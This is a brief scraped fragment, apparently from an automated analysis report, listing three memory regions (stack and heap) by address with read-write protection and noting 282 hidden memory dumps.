||
|
35F1CFF000
|
stack
|
page read and write
|
||
|
24A41254000
|
heap
|
page read and write
|
||
|
161850C4000
|
heap
|
page read and write
|
There are 282 hidden memdumps, click here to show them.